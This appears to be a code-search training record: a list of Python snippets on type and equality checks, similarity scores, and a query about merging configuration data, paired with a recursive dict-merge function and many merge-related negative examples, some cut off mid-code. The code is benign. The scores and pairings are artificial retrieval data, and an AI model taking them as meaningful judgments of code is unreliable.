begin.get_midpoint()\n end.get_midpoint()\n except AttributeError:\n return False\n\n return isinstance(begin.get_midpoint(), type(end.get_midpoint()))", "def is_same_class(obj, a_class):\n\n if type(obj) is a_class:\n return True\n return False", "def test_differentClassesEquality(self):\n self.assertFalse(Record(1, 2) == DifferentRecord(1, 2))", "def check_instance(self):\n self.assertIsInstance(self.amenity_1, amenity)\n self.assertIsInstance(self.amenity_2, amenity)", "def areIdentical(*args):\n return _libsbml.Unit_areIdentical(*args)", "def __eq__(self, other):\n if self is other:\n return True\n if type(self) == type(other):\n return self._name == other._name and self._calories == other._calories and \\\n self._carbohydrates == other._carbohydrates and self._fat == other._fat\\\n and self._proteins == other._proteins", "def check_representations(self: Q, q_2: Q) -> bool:\n\n if self.representation == q_2.representation:\n return True\n\n else:\n raise Exception(f\"Oops, 2 have different representations: {self.representation} {q_2.representation}\")", "def test_not_equal_on_type_mismatch(self):\n a = objects.OpaqueObject(self.bytes_a, enums.OpaqueDataType.NONE)\n b = \"invalid\"\n self.assertTrue(a != b)\n self.assertTrue(b != a)", "def CheckType(self, *args, **kwargs):\n pass", "def _aresame(a, b):\n from .numbers import Number\n from .function import AppliedUndef, UndefinedFunction as UndefFunc\n if isinstance(a, Number) and isinstance(b, Number):\n return a == b and a.__class__ == b.__class__\n for i, j in zip_longest(_preorder_traversal(a), _preorder_traversal(b)):\n if i != j or type(i) != type(j):\n if ((isinstance(i, UndefFunc) and isinstance(j, UndefFunc)) or\n (isinstance(i, AppliedUndef) and isinstance(j, AppliedUndef))):\n if i.class_key() != j.class_key():\n return False\n else:\n return False\n return True", "def check_type(self):\n return True", "def equals_strings(self, item1, item2):\n if isinstance(item1, (text_type, binary_type)) is False or \\\n isinstance(item2, (text_type, binary_type)) is False:\n if self._verbose is True:\n logging.info(\"TypeError: Not same types \"\n \"(expected two strings).\")\n return False\n\n if isinstance(item1, binary_type):\n item1 = u(item1)\n if isinstance(item2, binary_type):\n item2 = u(item2)\n if self._case_sensitive is False:\n return item1.lower() == item2.lower()\n\n return item1 == item2", "def _equal_values(self, val1, val2):\n if self.f_supports(val1) != self.f_supports(val2):\n return False\n\n if not self.f_supports(val1) and not self.f_supports(val2):\n raise TypeError(\n \"I do not support the types of both inputs (`%s` and `%s`), \"\n \"therefore I cannot judge whether \"\n \"the two are equal.\" % (str(type(val1)), str(type(val2)))\n )\n\n if not self._values_of_same_type(val1, val2):\n return False\n\n return comparisons.nested_equal(val1, val2)", "def __eq__(self, other):\n if type(self) is not type(other):\n return NotImplemented\n \n # required\n if self.required != other.required:\n return False\n \n # title\n if self.title != other.title:\n return False\n \n # type\n if self.type is not other.type:\n return False\n \n # values\n if self.values != other.values:\n return False\n \n return True", "def __eq__(self, other: Any) -> bool:\n return (\n super().__eq__(other) and isinstance(other, AtomicField) and self._spark_data_type == other._spark_data_type\n )", "def __eq__(self, other: Any) -> bool:\n if not isinstance(other, type(self)):\n return NotImplemented\n return True", "def test_not_equal_on_type_mismatch(self):\n a = Digest(\n hashing_algorithm=self.hashing_algorithm_b,\n digest_value=self.digest_value_b,\n key_format_type=self.key_format_type_b)\n b = \"invalid\"\n\n self.assertTrue(a != b)\n self.assertTrue(b != a)", "def is_identical(self, other):\n return (self.compounddatatype == other.compounddatatype and\n self.min_row == other.min_row and\n self.max_row == other.max_row)", "def __eq__(self):\n if isinstance(other_book, Book):\n return self.title == other_book.title and self.isbn == other_book.isbn\n else:\n book_type=type(other_book)\n print(\"{other_book} is of type: {type}, and should be a User type\".format(other_book=other_book, type=book_type))", "def __eq__(self, other: Any) -> bool:\n # Subclasses should call this as part of their equality checks\n return (\n isinstance(other, BaseField)\n and self._is_nullable == other._is_nullable\n and self._resolve_field_name() == other._resolve_field_name() # may be None == None\n and self._spark_type_class == other._spark_type_class\n and self._metadata == other._metadata # may be None == None\n )", "def __eq__(self, other: Any) -> bool:\n return self.__class__ is other.__class__ and self.identifier == other.identifier", "def __eq__(self, other):\n if other.__class__ is not self.__class__:\n return NotImplemented\n return (\n self._tp__get_typed_properties()\n == other._tp__get_typed_properties()\n )", "def __eq__(self, other):\n if isinstance(other, six.string_types):\n return other == self.name\n elif isinstance(other, type(self)):\n return self.arrow_dtype == other.arrow_dtype\n else:\n return False", "def _assert_interface_types_equal(self, type1, type2):\n self.assertEqual(type1.name, type2.name)\n self.assertEqual(type1.description, type2.description)\n self._assert_parent_types_equal(type1, type2)\n self.assertEqual(\n set(type1.field_descriptors.iterkeys()),\n set(type2.field_descriptors.iterkeys()))\n for name, field_descriptor1 in type1.field_descriptors.iteritems():\n field_descriptor2 = type2.field_descriptors[name]\n self._assert_field_descriptors_equal(\n field_descriptor1, field_descriptor2)", "def same_as(self, other):\n return super().__eq__(other)", "def test_type(self):\n self.assertEqual(type(self.base1), BaseModel)\n self.assertEqual(type(self.base2), BaseModel)", "def test_difference_id(self):\n self.assertFalse(\n self.factory.create_type('iphone') is self.factory.create_type(\n 'iphone'))", "def is_equal(o1: object, o2: object) -> bool:\n if o1 is None and o2 is None:\n return True\n if o1 is None:\n return False\n return o1 == o2", "def __eq__(self, other):\n if isinstance(other, six.string_types):\n return other == self.name\n\n elif isinstance(other, type(self)):\n return self.xnd_dtype == other.xnd_dtype\n\n else:\n return False", "def checktypestest(chosen_df):\n for i in chosen_df:\n if not chosen_df.dtypes[1] == chosen_df.dtypes[i]:\n raise ValueError('Types do not match')", "def ne(self: _TT, other: _TT) -> bool: # pylint: disable=invalid-name\n if type(self) != type(other):\n raise TypeError(\"Types do not match\")\n return not self.eq(other)", "def _assert_scalar_types_equal(self, type1, type2):\n self.assertEqual(type1.name, type2.name)\n self.assertEqual(type1.description, type2.description)\n self.assertEqual(\n type1.scalar_descriptor_class_descriptor,\n type2.scalar_descriptor_class_descriptor)", "def __eq__(self, other):\n # Ensure same class and values match\n if isinstance(other, self.__class__):\n return self.__dict__ == other.__dict__\n else:\n return False", "def __eq__(self, other):\n return (\n isinstance(other, ConstraintType)\n and self.value == other.value\n and self.type == other.type\n )", "def __eq__(self, other):\n if self.__class__ != other.__class__:\n return False\n if self.primary != other.primary:\n return False\n return True", "def IsSimilar(self,other):\n self.__do_essential_memebers_exist__()\n other.__do_essential_memebers_exist__()\n return self.element_type == other.element_type", "def is_type_correct(*args):\n return _ida_hexrays.is_type_correct(*args)", "def __eq__(self, other):\n return (type(other) == type(self)\n and self.using_default_schema == other.using_default_schema\n and self.settings == other.settings\n and self.schema == other.schema\n and self.comment == other.comment)" ]
[ "0.826196", "0.7960103", "0.7685877", "0.75767535", "0.73899287", "0.7386229", "0.73627245", "0.72946095", "0.7151994", "0.7137583", "0.7062871", "0.7059909", "0.70217156", "0.69869566", "0.6975931", "0.69511235", "0.6951103", "0.682518", "0.6799043", "0.6766386", "0.67605907", "0.6745303", "0.6722047", "0.670175", "0.6641782", "0.6639441", "0.6604472", "0.65744555", "0.6563849", "0.65568525", "0.65446717", "0.6540496", "0.6540496", "0.6530363", "0.6525939", "0.6504735", "0.65009266", "0.6499613", "0.6489849", "0.64874965", "0.6472127", "0.6463393", "0.6452949", "0.6413423", "0.64057183", "0.6400714", "0.6399411", "0.6399228", "0.6388263", "0.63857216", "0.6385192", "0.6385192", "0.63817614", "0.63798493", "0.6376636", "0.63676655", "0.6367213", "0.63616407", "0.6357671", "0.63487995", "0.6319506", "0.6318727", "0.6285338", "0.62511575", "0.62423074", "0.6224768", "0.622301", "0.62210155", "0.62177867", "0.6206882", "0.62008214", "0.6200605", "0.6197593", "0.6194674", "0.6192736", "0.6184774", "0.6183999", "0.61496806", "0.6146822", "0.6146146", "0.6141046", "0.6140275", "0.61391515", "0.613341", "0.6122416", "0.61173713", "0.6113544", "0.6110359", "0.6103479", "0.6100146", "0.6096894", "0.60949904", "0.6084059", "0.6077556", "0.6074251", "0.60725856", "0.60645235", "0.60581887", "0.6050377", "0.6048975" ]
0.8348503
0
Merge data from another configuration space into this one.
def merge(one, two, overwrite=False, typecheck=True): if one is two: return if typecheck and not same_type(one, two): raise ValueError('Type mismatch') for (key, value) in two.items(): if key not in one: one[key] = value if typecheck and not same_type(one[key], value): raise ValueError('Type mismatch') if isinstance(value, dict): merge(one[key], two[key], overwrite, typecheck) elif not overwrite: continue else: one[key] = two[key]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def merge(self, other_config):\n # Make a copy of the current attributes in the config object.\n config_options = copy.copy(self._user_provided_options)\n\n # Merge in the user provided options from the other config\n config_options.update(other_config._user_provided_options)\n\n # Return a new config object with the merged properties.\n return Config(**config_options)", "def update(self, other: Mapping[str, Any]) -> None:\n self._config.update(self._flatten_dict(other))", "def merge(self, other):\n merged = copy.deepcopy(self.__dict__())\n for k, v in other.__dict__():\n if k in merged and getattr(self, k):\n if isinstance(v, (string_types, bool)):\n pass\n else:\n list_of_stuff = merged.get(k, [])\n for entry in v:\n if entry not in list_of_stuff:\n list_of_stuff.append(entry)\n merged[k] = list_of_stuff\n else:\n merged[k] = v\n return CondaEnvironmentProvider(**merged)", "def _merge(self, other: dict):\n self._storage = dict_merge(self._storage, other)", "def merge(self, other):\n\n for n in other.cfg_nodes:\n self.insert_cfgnode(n)\n\n for ins_addr, outs in other.out_branches.items():\n if ins_addr in self.out_branches:\n for stmt_idx, item in outs.items():\n if stmt_idx in self.out_branches[ins_addr]:\n self.out_branches[ins_addr][stmt_idx].merge(item)\n else:\n self.out_branches[ins_addr][stmt_idx] = item\n\n else:\n item = next(iter(outs.values()))\n self.out_branches[ins_addr][item.stmt_idx] = item", "def merge(self, other):\n for p in other:\n for key, val in p.items():\n self.contents[key] = val\n\n return self", "def update(self, other):\n _merge_dicts(self, other)", "def merge(self, other):\n if other.n_points != self.n_points:\n raise ValueError(\n 'Deduplicator size mismatch: '\n f'{self.n_points} != {other.n_points}'\n )\n self.data_reduced.extend(other.data_reduced)\n self.data_kd.extend(other.data_kd)", "def mergeWith(self, other):\n assert not other.synthesised\n self.globals.update(other.globals)\n self.signals.update(other.signals)\n self.startsOfDataPaths.update(other.startsOfDataPaths)\n self.subUnits.update(other.subUnits)\n \n for s in other.signals:\n s.ctx = self", "def merge(self, other):\n self._moments = merge_pqc([self, other])._moments\n self._parameters = sp.symarray(self.parameter_symbol, len(self.symbols))\n if self.flatten_circuit:\n self.flatten()", "def _map_merge(dest: \"BaseContainer\", src: \"BaseContainer\") -> None:\n from omegaconf import AnyNode, DictConfig, OmegaConf, ValueNode\n\n assert isinstance(dest, DictConfig)\n assert isinstance(src, DictConfig)\n src_type = src._metadata.object_type\n src_ref_type = get_ref_type(src)\n assert src_ref_type is not None\n\n # If source DictConfig is:\n # - an interpolation => set the destination DictConfig to be the same interpolation\n # - None => set the destination DictConfig to None\n if src._is_interpolation() or src._is_none():\n dest._set_value(src._value())\n _update_types(node=dest, ref_type=src_ref_type, object_type=src_type)\n return\n\n dest._validate_merge(value=src)\n\n def expand(node: Container) -> None:\n rt = node._metadata.ref_type\n val: Any\n if rt is not Any:\n if is_dict_annotation(rt):\n val = {}\n elif is_list_annotation(rt):\n val = []\n else:\n val = rt\n elif isinstance(node, DictConfig):\n val = {}\n else:\n assert False\n\n node._set_value(val)\n\n if (\n src._is_missing()\n and not dest._is_missing()\n and is_structured_config(src_ref_type)\n ):\n # Replace `src` with a prototype of its corresponding structured config\n # whose fields are all missing (to avoid overwriting fields in `dest`).\n src = _create_structured_with_missing_fields(\n ref_type=src_ref_type, object_type=src_type\n )\n\n if (dest._is_interpolation() or dest._is_missing()) and not src._is_missing():\n expand(dest)\n\n for key, src_value in src.items_ex(resolve=False):\n src_node = src._get_node(key, validate_access=False)\n dest_node = dest._get_node(key, validate_access=False)\n\n if isinstance(dest_node, DictConfig):\n dest_node._validate_merge(value=src_node)\n\n missing_src_value = _is_missing_value(src_value)\n\n if (\n isinstance(dest_node, Container)\n and OmegaConf.is_none(dest, key)\n and not missing_src_value\n and not OmegaConf.is_none(src_value)\n ):\n expand(dest_node)\n\n if dest_node is not None and dest_node._is_interpolation():\n target_node = dest_node._dereference_node(\n throw_on_resolution_failure=False\n )\n if isinstance(target_node, Container):\n dest[key] = target_node\n dest_node = dest._get_node(key)\n\n if (\n dest_node is None\n and is_structured_config(dest._metadata.element_type)\n and not missing_src_value\n ):\n # merging into a new node. Use element_type as a base\n dest[key] = DictConfig(content=dest._metadata.element_type, parent=dest)\n dest_node = dest._get_node(key)\n\n if dest_node is not None:\n if isinstance(dest_node, BaseContainer):\n if isinstance(src_value, BaseContainer):\n dest_node._merge_with(src_value)\n elif not missing_src_value:\n dest.__setitem__(key, src_value)\n else:\n if isinstance(src_value, BaseContainer):\n dest.__setitem__(key, src_value)\n else:\n assert isinstance(dest_node, ValueNode)\n assert isinstance(src_node, ValueNode)\n # Compare to literal missing, ignoring interpolation\n src_node_missing = src_value == \"???\"\n try:\n if isinstance(dest_node, AnyNode):\n if src_node_missing:\n node = copy.copy(src_node)\n # if src node is missing, use the value from the dest_node,\n # but validate it against the type of the src node before assigment\n node._set_value(dest_node._value())\n else:\n node = src_node\n dest.__setitem__(key, node)\n else:\n if not src_node_missing:\n dest_node._set_value(src_value)\n\n except (ValidationError, ReadonlyConfigError) as e:\n dest._format_and_raise(key=key, value=src_value, cause=e)\n else:\n from omegaconf import open_dict\n\n if is_structured_config(src_type):\n # verified to be compatible above in _validate_merge\n with open_dict(dest):\n dest[key] = src._get_node(key)\n else:\n dest[key] = src._get_node(key)\n\n _update_types(node=dest, ref_type=src_ref_type, object_type=src_type)\n\n # explicit flags on the source config are replacing the flag values in the destination\n flags = src._metadata.flags\n assert flags is not None\n for flag, value in flags.items():\n if value is not None:\n dest._set_flag(flag, value)", "def extend(clself, other):\n clself._cfg_def.extend(other._cfg_def)\n for key, optdef in clself._cfg_def.options.iteritems():\n setattr(clself, key, optdef)", "def extend(self, other, adapt_conf=True):\n # Check if category metadata match\n if (self.size() > 0) and (other.size() > 0):\n for attr in [\"is_cat_inclusive\", \"is_categorised\"]:\n a, b = getattr(self, attr), getattr(other, attr)\n if a != b:\n raise ConcatenationError(\n f\"Categorisation metadata is different for '{attr}': {a} != {b}\"\n )\n elif other.size() > 0:\n for attr in [\"is_cat_inclusive\", \"is_categorised\"]:\n setattr(self, attr, getattr(other, attr))\n if getattr(self, \"tstep_h\", None) is None:\n self.tstep_h = getattr(other, \"tstep_h\", None)\n else:\n if getattr(other, \"tstep_h\", None) is not None:\n if self.tstep_h != other.tstep_h:\n raise ConcatenationError(\n \"Extending by a TrackRun with different timestep is not allowed\"\n )\n if adapt_conf and other.conf is not None:\n if self.conf is None:\n self.conf = other.conf.copy()\n else:\n for field in self.conf._fields:\n if getattr(self.conf, field) != getattr(other.conf, field):\n setattr(self.conf, field, None)\n self.sources.extend(other.sources)\n\n new_data = pd.concat([self.data, other.data], sort=False)\n new_track_idx = new_data.index.get_level_values(0).to_series()\n new_track_idx = new_track_idx.ne(new_track_idx.shift()).cumsum() - 1\n\n mux = pd.MultiIndex.from_arrays(\n [new_track_idx, new_data.index.get_level_values(1)], names=new_data.index.names\n )\n self.data = new_data.set_index(mux)\n\n # Concatenate categories\n if (self.cats is not None) or (other.cats is not None):\n new_cats = pd.concat([self.cats, other.cats], sort=False).fillna(False)\n new_track_idx = new_cats.index.get_level_values(0).to_series()\n new_track_idx = new_track_idx.ne(new_track_idx.shift()).cumsum() - 1\n\n ix = pd.Index(new_track_idx, name=new_cats.index.name)\n self.cats = new_cats.set_index(ix)", "def merge_from(self, other):\n assert not self.is_final\n if self.parent is not None:\n assert other.parent is not None\n self.parent.merge_from(other.parent)\n self.isolated_names.update(other.isolated_names)\n self.read.update(other.read)\n self.modified.update(other.modified)\n self.bound.update(other.bound)\n self.deleted.update(other.deleted)\n self.annotations.update(other.annotations)\n self.params.update(other.params)", "def merge(target_config, other_config):\n for key, value in other_config.items():\n if key not in target_config or not isinstance(value, dict):\n target_config[key] = value\n else:\n merge(target_config[key], other_config[key])", "def merge(self, other):\n\n assert self.ins_addr == other.ins_addr\n assert self.type == other.type\n\n o = self.copy()\n o.targets |= other.targets\n\n return o", "def merge(self, other):\n self.isotxsMetadata = self.isotxsMetadata.merge(\n other.isotxsMetadata, self, other, \"ISOTXS\", AttributeError\n )\n self.gamisoMetadata = self.gamisoMetadata.merge(\n other.gamisoMetadata, self, other, \"GAMISO\", AttributeError\n )\n self.pmatrxMetadata = self.pmatrxMetadata.merge(\n other.pmatrxMetadata, self, other, \"PMATRX\", AttributeError\n )\n self.micros.merge(other.micros)\n self.gammaXS.merge(other.gammaXS)\n self.neutronHeating = _mergeAttributes(self, other, \"neutronHeating\")\n self.neutronDamage = _mergeAttributes(self, other, \"neutronDamage\")\n self.gammaHeating = _mergeAttributes(self, other, \"gammaHeating\")\n self.isotropicProduction = _mergeAttributes(self, other, \"isotropicProduction\")\n self.linearAnisotropicProduction = _mergeAttributes(\n self, other, \"linearAnisotropicProduction\"\n )\n # this is lazy, but should work, because the n-order wouldn't be set without the others being set first.\n self.nOrderProductionMatrix = (\n self.nOrderProductionMatrix or other.nOrderProductionMatrix\n )", "def merge(self, other):\n log.debug('Merging: %s and %s' % (self.serialize(), other.serialize()))\n for k in self.keys():\n for new_item in other[k]:\n if new_item not in self[k]:\n self[k].append(new_item)\n log.debug('Result: %s' % self.serialize())\n return self", "def merge(self, other):\r\n self._train_datas = np.concatenate(\r\n [self._train_datas, other._train_datas], 0)\r\n self._train_labels = np.concatenate(\r\n [self._train_labels, other._train_labels], 0)", "def merge(self, newer_config, **kwargs):\n kwargs['merge'] = True\n logger.debug('from parent merge: %s', kwargs)\n return self.update(newer_config, **kwargs)", "def merge(self, other):\n from .dataset import Dataset\n\n if other is None:\n return self.to_dataset()\n else:\n other_vars = getattr(other, 'variables', other)\n coords = merge_coords_without_align([self.variables, other_vars])\n return Dataset._from_vars_and_coord_names(coords, set(coords))", "def combine(self, other):\n # Copy and merge\n ppt = PPT()\n ppt.contents = dict(self.contents)\n ppt.merge(other)\n return ppt", "def merge_configs(config1, config2, additional_keys = []):\n\t\tmerged_config = copy.deepcopy(config1)\n\t\t\n\t\tfor key in list(set([\n\t\t\t\t\"nicks\",\n\t\t\t\t\"directories\",\n\t\t\t\t\"files\",\n\t\t\t\t\"folders\",\n\t\t\t\t\"x_expressions\",\n\t\t\t\t\"scale_factors\",\n\t\t\t\t\"weights\",\n\t\t\t\t\"x_bins\",\n\t\t\t\t\"y_bins\",\n\t\t\t\t\"z_bins\",\n\t\t\t\t\"tree_draw_options\",\n\t\t\t\t\"proxy_prefixes\",\n\t\t\t\t\"histogram_to_scale_nicks\",\n\t\t\t\t\"integral_histogram_nicks\",\n\t\t\t\t\"scale_by_inverse_integrals\",\n\t\t\t\t\"add_nicks\",\n\t\t\t\t\"add_result_nicks\",\n\t\t\t\t\"sum_nicks\",\n\t\t\t\t\"sum_result_nicks\",\n\t\t\t\t\"stacks\",\n\t\t\t\t\"markers\",\n\t\t\t\t\"colors\",\n\t\t\t\t\"labels\",\n\t\t\t\t\"legend_markers\",\n\t\t\t\t\"shape_nicks\",\n\t\t\t\t\"yield_nicks\",\n\t\t\t\t\"shape_yield_nicks\"\n\t\t] + additional_keys)):\n\t\t\tif key in merged_config or key in config2:\n\t\t\t\tmerged_config.setdefault(key, []).extend(config2.get(key, []))\n\t\t\n\t\tfor key in [\n\t\t\t\t\"analysis_modules\",\n\t\t]:\n\t\t\tfor item in config2.get(key, []):\n\t\t\t\tif not item in merged_config.get(key, []):\n\t\t\t\t\tmerged_config.setdefault(key, []).append(item)\n\t\t\n\t\tfor key, value in config2.iteritems():\n\t\t\tif not key in merged_config:\n\t\t\t\tmerged_config[key] = value\n\t\t\n\t\treturn merged_config", "def merge(a, b):\n if isinstance(a, CONFIG_VALID) \\\n and isinstance(b, CONFIG_VALID):\n # dict update\n if isinstance(a, dict) and isinstance(b, dict):\n a.update(b)\n return a\n # list update\n _a = list(a)\n for x in list(b):\n if x not in _a:\n _a.append(x)\n return _a\n if a and b:\n raise Exception(\"Cannot merge\")\n raise NotImplementedError", "def deep_merge(d1, d2):\n for k, v in d1.copy().items():\n if k in d2:\n if all(isinstance(e, MutableMapping) for e in (v, d2[k])):\n d2[k] = ConfigManager.deep_merge(v, d2[k])\n\n if k == \"*\":\n for _k, _v in d2.items():\n if all(isinstance(e, MutableMapping) for e in (v, d2[_k])):\n d2[_k] = ConfigManager.deep_merge(v, d2[_k])\n del d1[k]\n d3 = d1.copy()\n d3.update(d2)\n return d3", "def merged_rep(self,other):\n raise NotImplementedError(\"Abstract method\")", "def merge(self, other):\n\n if not self.can_merge(other):\n raise ValueError('These protocols can not be safely merged.')\n\n inputs_to_consider = self._find_inputs_to_merge()\n\n for input_path in inputs_to_consider:\n\n merge_behavior = getattr(type(self), input_path.property_name).merge_behavior\n\n if merge_behavior == MergeBehaviour.ExactlyEqual:\n continue\n\n if (isinstance(self.get_value(input_path), ProtocolPath) or\n isinstance(other.get_value(input_path), ProtocolPath)):\n\n continue\n\n if merge_behavior == InequalityMergeBehaviour.SmallestValue:\n value = min(self.get_value(input_path), other.get_value(input_path))\n elif merge_behavior == InequalityMergeBehaviour.LargestValue:\n value = max(self.get_value(input_path), other.get_value(input_path))\n else:\n raise NotImplementedError()\n\n self.set_value(input_path, value)\n\n return {}", "def __add__(self, other):\r\n # Make a defaultdict of defaultdicts, the latter of which returns\r\n # None when an key is not present\r\n merged_data = defaultdict(lambda: defaultdict(lambda: None))\r\n\r\n # We will keep track of all unique sample_ids and metadata headers\r\n # we have seen as we go\r\n all_sample_ids = set()\r\n all_headers = set()\r\n\r\n # add all values from self into the merged_data structure\r\n for sample_id, data in self._metadata.iteritems():\r\n all_sample_ids.add(sample_id)\r\n for header, value in data.iteritems():\r\n all_headers.add(header)\r\n merged_data[sample_id][header] = value\r\n\r\n # then add all data from other\r\n for sample_id, data in other._metadata.iteritems():\r\n all_sample_ids.add(sample_id)\r\n for header, value in data.iteritems():\r\n all_headers.add(header)\r\n # if the two mapping files have identical sample_ids and\r\n # metadata columns but have DIFFERENT values, raise a value\r\n # error\r\n if merged_data[sample_id][header] is not None and \\\r\n merged_data[sample_id][header] != value:\r\n raise ValueError(\"Different values provided for %s for \"\r\n \"sample %s in different mapping files.\"\r\n % (header, sample_id))\r\n else:\r\n merged_data[sample_id][header] = value\r\n\r\n # Now, convert what we have seen into a normal dict\r\n normal_dict = {}\r\n for sample_id in all_sample_ids:\r\n if sample_id not in normal_dict:\r\n normal_dict[sample_id] = {}\r\n\r\n for header in all_headers:\r\n normal_dict[sample_id][header] = \\\r\n merged_data[sample_id][header]\r\n\r\n # and create a MetadataMap object from it; concatenate comments\r\n return self.__class__(normal_dict, self.Comments + other.Comments)", "def merge(self, graph):\n # keep previous self.filename\n # copy data\n for x in graph.data:\n self.data.append(x)\n # copy headers, unless already exists (is so, info is lost)\n for key in graph.headers:\n if key not in self.headers:\n self.headers.update({key: graph.headers[key]})\n # copy graphInfo, unless already exists (is so, info is lost)\n for key in graph.graphInfo:\n if key not in self.graphInfo:\n self.graphInfo.update({key: graph.graphInfo[key]})\n # copy sampleInfo, unless already exists (is so, info is lost)\n for key in graph.sampleInfo:\n if key not in self.sampleInfo:\n self.sampleInfo.update({key: graph.sampleInfo[key]})", "def concat(self, other):\n self.add_rules(other.cliques)\n self.prop_names.update(other.prop_names)", "def merge_other(self, other):\n assert(not other.isSet())\n with self.__cond:\n if self.__isset:\n other.set(self.__data)\n else:\n self.__merged.append(other)", "def __merge_configs(cls, a, b, path=None):\n\n # This function is modeled after:\n # https://stackoverflow.com/questions/7204805/dictionaries-of-dictionaries-merge\n\n if path is None: path = []\n\n for key in b:\n if key in a:\n if isinstance(a[key], dict) and isinstance(b[key], dict):\n cls.__merge_configs(a[key], b[key], path + [str(key)])\n elif isinstance(a[key], list) and isinstance(b[key], list):\n # Easy enough to merge lists of non-dict items...\n try:\n al = set(a[key])\n bl = set(b[key])\n bl.update(al)\n a[key] = list(bl)\n except (TypeError, AttributeError) as e:\n log.warning('problem merging lists when merging configurations'\n '(are there dict args in one at path %s?):'\n '\\n%s\\n%s\\nKeeping the first one due to error %s'\n % (path, a[key], b[key], e))\n else:\n # Same key, but different value type. This is difficult to\n # handle so we just keep the value of the first one.\n pass\n else:\n a[key] = b[key]\n return a", "def merge_config(a, b):\n for key, b_value in b.items():\n if not isinstance(b_value, dict):\n a[key] = b_value\n else:\n a_value = a.get(key)\n if a_value is not None and isinstance(a_value, dict):\n merge_config(a_value, b_value)\n else:\n a[key] = b_value\n return a", "def _merge(self):\n raise NotImplementedError", "def createMergedConfigFile(self):\n # Read config data\n if os.path.isfile(self.config_file):\n with open(self.config_file, 'r') as stream:\n try:\n cfg = yaml.safe_load(stream)\n except yaml.YAMLError as exc:\n print(exc)\n if debug:\n print(\"Using Config file: \" + self.config_file)\n else:\n if debug:\n print(\"Config file does not exist: \" + self.config_file)\n exit(1)\n\n # If project namespace was not in the config file, set a default\n if (cfg is not None\n and 'generic' in cfg\n and 'project_namespace' in cfg['generic']\n and cfg['generic']['project_namespace'] is not None\n and len(cfg['generic']['project_namespace']) > 0):\n if debug:\n print(\"Using specified namespace\")\n else:\n conf_dir = os.path.dirname(self.config_file)\n cmd = \"cd \" + conf_dir + ' && basename `git rev-parse --show-toplevel`'\n try:\n result_bytes = subprocess.check_output(cmd,\n timeout=300,\n shell=True)\n project_namespace = result_bytes.decode('UTF-8').rstrip()\n if debug:\n print(\"Derived namespace from git: \" + project_namespace)\n except subprocess.CalledProcessError as e:\n if debug:\n print(\"Error deriving project namespace from git: \", e.output)\n sys.exit(1)\n # Insert the project_namespace into the config data\n if cfg is None:\n cfg = {}\n if 'generic' not in cfg:\n cfg['generic'] = {}\n cfg['generic']['project_namespace'] = project_namespace\n\n # Confirm project namespace\n if debug:\n print(\"Project Namespace: \" + cfg['generic']['project_namespace'])\n\n # Read overrides\n override_file_data = {}\n if os.path.isfile(self.override_file):\n with open(self.override_file, 'r') as stream:\n try:\n override_file_data = yaml.safe_load(stream)\n except yaml.YAMLError as exc:\n print(exc)\n\n # Created merged data\n self.config_data = cfg\n # print(\"Applying override_file_data: \" + str(override_file_data))\n if override_file_data is not None:\n self.config_data = merge(self.config_data, override_file_data)\n\n # Ensure parent directory for merged file exists\n directory = Path(self.merged_file).parent\n if not os.path.exists(directory):\n os.makedirs(directory)\n # Created merged file\n with open(self.merged_file, 'w') as out_file:\n yaml.dump(self.config_data, out_file)", "def _merge_raw(self, other):\n if other is None:\n variables = OrderedDict(self.variables)\n else:\n # don't align because we already called xarray.align\n variables = merge_coords_without_align(\n [self.variables, other.variables])\n return variables", "def merge_contextual(self, other):\n # TODO: This is currently dependent on our data model? Make more robust to schema changes\n # Currently we assume all lists at Compound level, with 1 further potential nested level of lists\n for k in self.keys():\n # print('key: %s' % k)\n for item in self[k]:\n # print('item: %s' % item)\n for other_item in other.get(k, []):\n # Skip text properties (don't merge names, labels, roles)\n if isinstance(other_item, six.text_type):\n continue\n for otherk in other_item.keys():\n if isinstance(other_item[otherk], list):\n if len(other_item[otherk]) > 0 and len(item[otherk]) > 0:\n other_nested_item = other_item[otherk][0]\n for othernestedk in other_nested_item.keys():\n for nested_item in item[otherk]:\n if not nested_item[othernestedk]:\n nested_item[othernestedk] = other_nested_item[othernestedk]\n elif not item[otherk]:\n item[otherk] = other_item[otherk]\n log.debug('Result: %s' % self.serialize())\n return self", "def merge(self, other):\n self._mergeKeys(other)\n self._binaryOperationCheck(other)\n for id in self.clock.keys():\n print id\n self.clock[id] = max(self.clock[id], other.clock[id])", "def override_from_folder(self, other: ItemVariant) -> None:\n self.authors.extend(other.authors)\n self.tags.extend(self.tags)\n self.vbsp_config = lazy_conf.concat(self.vbsp_config, other.vbsp_config)\n self.desc = tkMarkdown.join(self.desc, other.desc)", "def merge(self, other):\n\n for child in other.children:\n self.add_deep_copy_of(child, merged=True)", "def copy_from_other(self, other):\n self.data = other.data\n self.url = other.url\n self.container_factory = other.container_factory", "def update_config(self, data):\n self.config.data = dict_merge(self.config.data, data)\n self.config.save()", "def merge(self, session, source_state, source_dict, dest_state,\n dest_dict, load, _recursive):\n\n pass", "def merge(self, other, allow_duplicate=False, do_spaces=True, do_datasets=True, do_tasksets=True, do_results=True):\n #TODO: May need to organize a staging area to ensure this merge is atomic\n if self.mode == 'r': raise ValueError, \"Cannot merge into read-only store\"\n ignored_md = ['uuid', 'avg_learn', 'avg_classify', 'name', 'feature_name', 'class_name']\n\n space_direct_copy = [] # Spaces we copy directly, meaning the featuremap can be copied too\n space_feature_mapping = {}\n if do_spaces or do_datasets:\n # Must do spaces if we do datasets, because spaces may have been updated\n for space_node in ProgressIter(list(other.spaces), label='Copying spaces'):\n logger.debug(\"Considering space '%s'\", space_node._v_name)\n space_name = space_node._v_name\n if hasattr(self.spaces, space_name):\n logger.debug('Already had %s', space_name)\n src_space = other.get_Space(space_name)\n # Need to merge these. Feature spaces can be extended, but there is no mechanism for doing the same with class\n # spaces at the moment, so we must reject any that do not match. \n dst_space = self.get_Space(space_name)\n if src_space == dst_space:\n logger.debug(' Exact match')\n space_direct_copy.append(space_name)\n else:\n md = get_metadata(space_node)\n if md['type'] == 'class':\n raise ValueError, \"Cannot merge due to different versions of %s\" % str(md)\n elif md['type'] == 'feature':\n logger.debug(' Attempting to merge %s', str(md))\n # Reconcile the spaces. \n ## First we need to compute the new features to add\n new_feats = sorted(set(src_space) - set(dst_space))\n logger.debug(' Identified %d new features', len(new_feats))\n reconciled_space = dst_space + new_feats\n if len(new_feats) != 0:\n # Only need to extend if new features are found.\n self.extend_Space(space_name, reconciled_space)\n ## Now we need to build the mapping from the external space to ours\n space_index = dict( (k,v) for v,k in 